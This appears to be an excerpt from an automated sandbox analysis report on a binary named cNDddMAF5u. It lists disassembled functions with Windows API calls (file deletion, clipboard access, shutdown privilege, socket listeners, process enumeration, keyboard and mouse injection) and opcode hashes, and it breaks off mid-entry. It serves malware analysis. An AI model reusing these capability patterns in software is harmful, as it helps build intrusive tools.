                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: CurrentDirectoryTime$File$Local$System
                                                        • String ID: *.*
                                                        • API String ID: 1464919966-438819550
                                                        • Opcode ID: 48452b16928ef603588618d09cca59f2c2779492830f2bac37c443cacdf16ff5
                                                        • Instruction ID: ee5a00459475c0016f33f05d97cb47686beae59588e32ce1db2c221b064d05e6
                                                        • Opcode Fuzzy Hash: 48452b16928ef603588618d09cca59f2c2779492830f2bac37c443cacdf16ff5
                                                        • Instruction Fuzzy Hash: 166199B25043059FCB50EF24C8409AEB3E9FF89310F04891EF99983291EB39E945CF96
                                                        APIs
                                                          • Part of subcall function 006A3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,006A3A97,?,?,006A2E7F,?,?,?,00000000), ref: 006A3AC2
                                                          • Part of subcall function 0070E199: GetFileAttributesW.KERNEL32(?,0070CF95), ref: 0070E19A
                                                        • FindFirstFileW.KERNEL32(?,?), ref: 0070D122
                                                        • DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 0070D1DD
                                                        • MoveFileW.KERNEL32(?,?), ref: 0070D1F0
                                                        • DeleteFileW.KERNEL32(?,?,?,?), ref: 0070D20D
                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 0070D237
                                                          • Part of subcall function 0070D29C: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,0070D21C,?,?), ref: 0070D2B2
                                                        • FindClose.KERNEL32(00000000,?,?,?), ref: 0070D253
                                                        • FindClose.KERNEL32(00000000), ref: 0070D264
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
                                                        • String ID: \*.*
                                                        • API String ID: 1946585618-1173974218
                                                        • Opcode ID: 2123958ab6224cfcd3116ee9523b54832fffbfcf6e535070563ba814728b8c0b
                                                        • Instruction ID: 5b485ea974199b4da6998b3135cce1f03d8f384a23903385a0476121bb0d31b6
                                                        • Opcode Fuzzy Hash: 2123958ab6224cfcd3116ee9523b54832fffbfcf6e535070563ba814728b8c0b
                                                        • Instruction Fuzzy Hash: A0615E3180121DDACF15FBE0D9529EDB7B6AF55300F248269E40277191EB386F09CF65
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                        • String ID:
                                                        • API String ID: 1737998785-0
                                                        • Opcode ID: 5705526faaaa3166002226cbc754cff79106ee905d0d9dffa1bfb04532aadb1c
                                                        • Instruction ID: 66263e73eae3fca92356e683730931daf0f21c77e5e702b0db48aa06776f526b
                                                        • Opcode Fuzzy Hash: 5705526faaaa3166002226cbc754cff79106ee905d0d9dffa1bfb04532aadb1c
                                                        • Instruction Fuzzy Hash: A4419F352046119FE311DF19E849B59BBE1FF44329F14C09DE8599B6A2C739EC81CB94
                                                        APIs
                                                          • Part of subcall function 007016C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0070170D
                                                          • Part of subcall function 007016C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0070173A
                                                          • Part of subcall function 007016C3: GetLastError.KERNEL32 ref: 0070174A
                                                        • ExitWindowsEx.USER32(?,00000000), ref: 0070E932
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                        • String ID: $ $@$SeShutdownPrivilege
                                                        • API String ID: 2234035333-3163812486
                                                        • Opcode ID: 170e4a273236c69d0c3b918c64ff8ab23184af757cd236027fb452772561c2ca
                                                        • Instruction ID: 6a7c54a4c9d6d6800e2f802ed8370c50a29c59c69266756b6b6c0230dca4711c
                                                        • Opcode Fuzzy Hash: 170e4a273236c69d0c3b918c64ff8ab23184af757cd236027fb452772561c2ca
                                                        • Instruction Fuzzy Hash: 0A01D673620311EBFB5466B49C8ABBB72DCA714751F154F21FC03F21D1D5AD6C408295
                                                        APIs
                                                        • socket.WSOCK32(00000002,00000001,00000006), ref: 00721276
                                                        • WSAGetLastError.WSOCK32 ref: 00721283
                                                        • bind.WSOCK32(00000000,?,00000010), ref: 007212BA
                                                        • WSAGetLastError.WSOCK32 ref: 007212C5
                                                        • closesocket.WSOCK32(00000000), ref: 007212F4
                                                        • listen.WSOCK32(00000000,00000005), ref: 00721303
                                                        • WSAGetLastError.WSOCK32 ref: 0072130D
                                                        • closesocket.WSOCK32(00000000), ref: 0072133C
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: ErrorLast$closesocket$bindlistensocket
                                                        • String ID:
                                                        • API String ID: 540024437-0
                                                        • Opcode ID: bc04bc5a61fde4b1141c4fe45fb255db6bf67f1c217dd47c54dce022809cdaa9
                                                        • Instruction ID: 4ccba42980433399728e2d7054b0581ea747717162306dd9ccbe47a85726deb0
                                                        • Opcode Fuzzy Hash: bc04bc5a61fde4b1141c4fe45fb255db6bf67f1c217dd47c54dce022809cdaa9
                                                        • Instruction Fuzzy Hash: 8B419231A00110DFD710DF24D498B6ABBE6BF56318F588198E8569F293C779ED81CBE1
                                                        APIs
                                                        • _free.LIBCMT ref: 006DB9D4
                                                        • _free.LIBCMT ref: 006DB9F8
                                                        • _free.LIBCMT ref: 006DBB7F
                                                        • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00743700), ref: 006DBB91
                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,0077121C,000000FF,00000000,0000003F,00000000,?,?), ref: 006DBC09
                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00771270,000000FF,?,0000003F,00000000,?), ref: 006DBC36
                                                        • _free.LIBCMT ref: 006DBD4B
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                                        • String ID:
                                                        • API String ID: 314583886-0
                                                        • Opcode ID: 15ac8ccb4121a5c3931db7cd4b0820a51b8e612b78db06c5673b133df5f30674
                                                        • Instruction ID: 28bf3f34090576106390a5f83318100de19ccc6858a37cf329b0aa4061576a88
                                                        • Opcode Fuzzy Hash: 15ac8ccb4121a5c3931db7cd4b0820a51b8e612b78db06c5673b133df5f30674
                                                        • Instruction Fuzzy Hash: 1AC15571E00245EFCB209F688C51BEA7BAAEF45350F1A519FE484DB35AEB308E418758
                                                        APIs
                                                          • Part of subcall function 006A3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,006A3A97,?,?,006A2E7F,?,?,?,00000000), ref: 006A3AC2
                                                          • Part of subcall function 0070E199: GetFileAttributesW.KERNEL32(?,0070CF95), ref: 0070E19A
                                                        • FindFirstFileW.KERNEL32(?,?), ref: 0070D420
                                                        • DeleteFileW.KERNEL32(?,?,?,?), ref: 0070D470
                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 0070D481
                                                        • FindClose.KERNEL32(00000000), ref: 0070D498
                                                        • FindClose.KERNEL32(00000000), ref: 0070D4A1
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                        • String ID: \*.*
                                                        • API String ID: 2649000838-1173974218
                                                        • Opcode ID: de3592f7ecedccc19fa7872ef1e67ce3f756c0b560d426b2965a57d416257810
                                                        • Instruction ID: 793ff6efe064ec72033b4acb804380952c8e909574a60aa9fdebf398e7e03d2b
                                                        • Opcode Fuzzy Hash: de3592f7ecedccc19fa7872ef1e67ce3f756c0b560d426b2965a57d416257810
                                                        • Instruction Fuzzy Hash: 7B316F710083959BC255FFA4D8518AFB7E9BE92300F448A1DF8D193191EB28AE09CB67
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: __floor_pentium4
                                                        • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                        • API String ID: 4168288129-2761157908
                                                        • Opcode ID: 6c3770fec6e0559c48b96aeb2d928ea9200718a10a10bbc894e9dfbbfc8d253f
                                                        • Instruction ID: bba3fbb32d3d55527ad7070aaff4de3d56373651a416590b01eacc1d0657ed63
                                                        • Opcode Fuzzy Hash: 6c3770fec6e0559c48b96aeb2d928ea9200718a10a10bbc894e9dfbbfc8d253f
                                                        • Instruction Fuzzy Hash: 07C23871E086288BDB65DF289D407EAB7B6EB48304F1441EBD84EE7341E775AE818F40
                                                        APIs
                                                        • _wcslen.LIBCMT ref: 007164DC
                                                        • CoInitialize.OLE32(00000000), ref: 00716639
                                                        • CoCreateInstance.OLE32(0073FCF8,00000000,00000001,0073FB68,?), ref: 00716650
                                                        • CoUninitialize.OLE32 ref: 007168D4
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                        • String ID: .lnk
                                                        • API String ID: 886957087-24824748
                                                        • Opcode ID: 033df36a20270cccbd063e3a312083d8aa30a822dcfc255e058f406ae7a79833
                                                        • Instruction ID: 491dfb617ad6986f4d0a749aa88b1876513d99e144bcf417b9f86581de10c24d
                                                        • Opcode Fuzzy Hash: 033df36a20270cccbd063e3a312083d8aa30a822dcfc255e058f406ae7a79833
                                                        • Instruction Fuzzy Hash: 7DD14971508301AFD344EF24C8819ABB7EAFF95704F10496DF5958B2A2EB70ED45CBA2
                                                        APIs
                                                        • GetForegroundWindow.USER32(?,?,00000000), ref: 007222E8
                                                          • Part of subcall function 0071E4EC: GetWindowRect.USER32(?,?), ref: 0071E504
                                                        • GetDesktopWindow.USER32 ref: 00722312
                                                        • GetWindowRect.USER32(00000000), ref: 00722319
                                                        • mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 00722355
                                                        • GetCursorPos.USER32(?), ref: 00722381
                                                        • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 007223DF
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: Window$Rectmouse_event$CursorDesktopForeground
                                                        • String ID:
                                                        • API String ID: 2387181109-0
                                                        • Opcode ID: 57c7e97d65b63781457456a6b84cd09b205430c4fb9d9dd7ab00d84aac98eb4b
                                                        • Instruction ID: fd7a2b360e980787fb60acf02511e7fda63e51ec92b25a1d93f8916eb7834769
                                                        • Opcode Fuzzy Hash: 57c7e97d65b63781457456a6b84cd09b205430c4fb9d9dd7ab00d84aac98eb4b
                                                        • Instruction Fuzzy Hash: C031E272504315AFD721DF14D849B5BB7E9FF84310F004A1DF985A7192DB38E909CB96
                                                        APIs
                                                          • Part of subcall function 006A9CB3: _wcslen.LIBCMT ref: 006A9CBD
                                                        • FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 00719B78
                                                        • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 00719C8B
                                                          • Part of subcall function 00713874: GetInputState.USER32 ref: 007138CB
                                                          • Part of subcall function 00713874: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00713966
                                                        • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 00719BA8
                                                        • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00719C75
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
                                                        • String ID: *.*
                                                        • API String ID: 1972594611-438819550
                                                        • Opcode ID: fd2ea34f4a88fcf58d31193a6b872b2dff3b3ed5f5a0c5d42423079dd0b18439
                                                        • Instruction ID: 4a0d27f22a23c9ab24aa3c9d21ca0038bd667658e33744d4e2c0b40b01f7bb54
                                                        • Opcode Fuzzy Hash: fd2ea34f4a88fcf58d31193a6b872b2dff3b3ed5f5a0c5d42423079dd0b18439
                                                        • Instruction Fuzzy Hash: 6C41A2719042199FDF55EF68C855AEEBBB9EF05300F204059E905A32D1DB389E85CFA4
                                                        APIs
                                                          • Part of subcall function 006B9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 006B9BB2
                                                        • DefDlgProcW.USER32(?,?,?,?,?), ref: 006B9A4E
                                                        • GetSysColor.USER32(0000000F), ref: 006B9B23
                                                        • SetBkColor.GDI32(?,00000000), ref: 006B9B36
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: Color$LongProcWindow
                                                        • String ID:
                                                        • API String ID: 3131106179-0
                                                        • Opcode ID: 0ee2cf8d4f7ff404f8c2a7d21d8c74d8118144bda38532993b912e06d662e62b
                                                        • Instruction ID: 9e4622eddce1af2bc9741760b605c09c36d9c21aee008c8134c24f71fd9a7ba8
                                                        • Opcode Fuzzy Hash: 0ee2cf8d4f7ff404f8c2a7d21d8c74d8118144bda38532993b912e06d662e62b
                                                        • Instruction Fuzzy Hash: 9AA117F0118448EEE729AA3C8C99EFB369FDF42340F154119F702D6792CA299D82D776
                                                        APIs
                                                          • Part of subcall function 0072304E: inet_addr.WSOCK32(?), ref: 0072307A
                                                          • Part of subcall function 0072304E: _wcslen.LIBCMT ref: 0072309B
                                                        • socket.WSOCK32(00000002,00000002,00000011), ref: 0072185D
                                                        • WSAGetLastError.WSOCK32 ref: 00721884
                                                        • bind.WSOCK32(00000000,?,00000010), ref: 007218DB
                                                        • WSAGetLastError.WSOCK32 ref: 007218E6
                                                        • closesocket.WSOCK32(00000000), ref: 00721915
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
                                                        • String ID:
                                                        • API String ID: 1601658205-0
                                                        • Opcode ID: 18012652593e9850eba5903c06e712f3a93cd8ba419a13d95dc64093105d3c1b
                                                        • Instruction ID: 9fa1c8e9333f4dc4842860c6037e8627a55bc8e01ef0a4525272747a73bfc9e1
                                                        • Opcode Fuzzy Hash: 18012652593e9850eba5903c06e712f3a93cd8ba419a13d95dc64093105d3c1b
                                                        • Instruction Fuzzy Hash: 8051C371A00210AFEB10AF24D886F6A77E6AF45718F48805CF949AF3C3C775ED418BA5
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: ERCP$VUUU$VUUU$VUUU$VUUU
                                                        • API String ID: 0-1546025612
                                                        • Opcode ID: 03a0519ed3f9dfa5ff92a11d4200ebabee6bfb15873f2cca51dce15ec8cf365e
                                                        • Instruction ID: 06b8b75304216b54d4e2a70e59847dd219a725b5e747d5b63e94db691bc4545a
                                                        • Opcode Fuzzy Hash: 03a0519ed3f9dfa5ff92a11d4200ebabee6bfb15873f2cca51dce15ec8cf365e
                                                        • Instruction Fuzzy Hash: 0BA26A70E0125ACFDF24DF59C8507EDB7B2BB55314F2481AAE816A7385EB709E818F90
                                                        APIs
                                                        • lstrlenW.KERNEL32(?,?,?,00000000), ref: 007082AA
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: lstrlen
                                                        • String ID: ($tbv$|
                                                        • API String ID: 1659193697-2555993713
                                                        • Opcode ID: 7fe73acc6c199465cbaefbcc5c59b19ada97fe7675a49150cb442c4d614a6aa6
                                                        • Instruction ID: caa3681f2b34da061c2418641e246ada119f36e72eee85b3ca5486000c0b7b37
                                                        • Opcode Fuzzy Hash: 7fe73acc6c199465cbaefbcc5c59b19ada97fe7675a49150cb442c4d614a6aa6
                                                        • Instruction Fuzzy Hash: 0C323474A00605DFCB68CF59C481A6AB7F0FF48710B15866EE49ADB3A1EB74E981CB44
                                                        APIs
                                                        • CreateToolhelp32Snapshot.KERNEL32 ref: 0072A6AC
                                                        • Process32FirstW.KERNEL32(00000000,?), ref: 0072A6BA
                                                          • Part of subcall function 006A9CB3: _wcslen.LIBCMT ref: 006A9CBD
                                                        • Process32NextW.KERNEL32(00000000,?), ref: 0072A79C
                                                        • CloseHandle.KERNEL32(00000000), ref: 0072A7AB
                                                          • Part of subcall function 006BCE60: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,006E3303,?), ref: 006BCE8A
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
                                                        • String ID:
                                                        • API String ID: 1991900642-0
                                                        • Opcode ID: 2b30a008a829b119eb839f6f1e364df858fd906de108b2cfce406f65a6a0ba45
                                                        • Instruction ID: 89e1cef35de5ee43a98196cbcd2d826a504d29f405810b70188a0b05af8b738d
                                                        • Opcode Fuzzy Hash: 2b30a008a829b119eb839f6f1e364df858fd906de108b2cfce406f65a6a0ba45
                                                        • Instruction Fuzzy Hash: 1B5169B1508310AFD350EF24D886A6BBBE9FF89754F00892DF58997251EB34D904CBA6
                                                        APIs
                                                        • GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 0070AAAC
                                                        • SetKeyboardState.USER32(00000080), ref: 0070AAC8
                                                        • PostMessageW.USER32(?,00000102,00000001,00000001), ref: 0070AB36
                                                        • SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 0070AB88
                                                        Memory Dump Source
